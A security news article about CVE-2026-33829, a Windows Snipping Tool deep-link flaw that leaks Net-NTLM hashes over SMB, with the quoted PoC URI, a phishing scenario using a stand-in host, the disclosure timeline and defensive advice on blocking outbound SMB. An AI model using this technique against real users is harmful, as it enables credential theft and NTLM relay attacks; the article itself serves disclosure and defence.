“`html
A proof-of-concept (PoC) exploit has been made publicly available for a recently uncovered vulnerability in Microsoft’s Snipping Tool that enables attackers to covertly obtain users’ Net-NTLM credential hashes by enticing them to a harmful webpage.
Designated as CVE-2026-33829, the weakness exists in the manner Windows Snipping Tool processes deep link URI registrations utilizing the ms-screensketch protocol schema. Versions of the software that are affected register this deep link, which incorporates a filePath parameter.
Due to insufficient input validation, an attacker can provide a UNC path leading to a remote, attacker-controlled SMB server, forcing an authenticated SMB connection and capturing the victim’s Net-NTLM hash during the process.
The vulnerability was identified and reported by security experts at Black Arrow, who coordinated the disclosure with Microsoft prior to its public release.
Windows Snipping Tool PoC
Exploitation requires minimal technical prowess. An attacker only needs to host an ill-intended URL — or an HTML page that automatically triggers the deep link and persuade the target to access it. The PoC from Black Arrow Security illustrates the attack with a single browser-activated URI:
textms-screensketch:edit?&filePath=file.png&isTemporary=false&saved=true&source=Toast
When a victim engages with this link, Snipping Tool opens and quietly tries to load the remote resource via SMB. During this connection attempt, Windows automatically sends the user’s Net-NTLM authentication response to the attacker’s server, revealing credentials that can subsequently be cracked offline or exploited in NTLM relay attacks against internal network resources.
What renders CVE-2026-33829 especially hazardous is its natural inclination towards social engineering attacks. Since the Snipping Tool actually opens during the exploitation, the attack is visually congruent with convincing pretexts such as requesting an employee to crop a company wallpaper, modify a badge image, or review an HR document.
An attacker could register a domain like snip.example.com and present a persuasive image URL that inconspicuously transmits the malicious deep link payload behind the scenes.
The victim perceives nothing abnormal; the Snipping Tool opens as anticipated while NTLM authentication occurs seamlessly in the background.
This attack vector is particularly efficient in corporate settings where phishing emails pointing to internal HR portals, IT support desks, or shared document systems are prevalent.
Patch Availability and Timeline
Microsoft resolved the vulnerability in its April 14, 2026, Patch Tuesday security update. The disclosure timeline includes:
- March 23, 2026 — Vulnerability reported to Microsoft.
- April 14, 2026 — Microsoft delivers a security patch.
- April 14, 2026 — Coordinated public advisory and PoC release.
Organizations and individual users utilizing affected versions of the Windows Snipping Tool should promptly apply the April 14, 2026, security update.
Security teams ought to also surveil internal networks for unexpected outbound SMB connections (port 445) to external or unidentified hosts, which may signal active exploitation attempts. Blocking outbound SMB traffic at the network perimeter remains a robust defensive strategy irrespective of patch status.
“`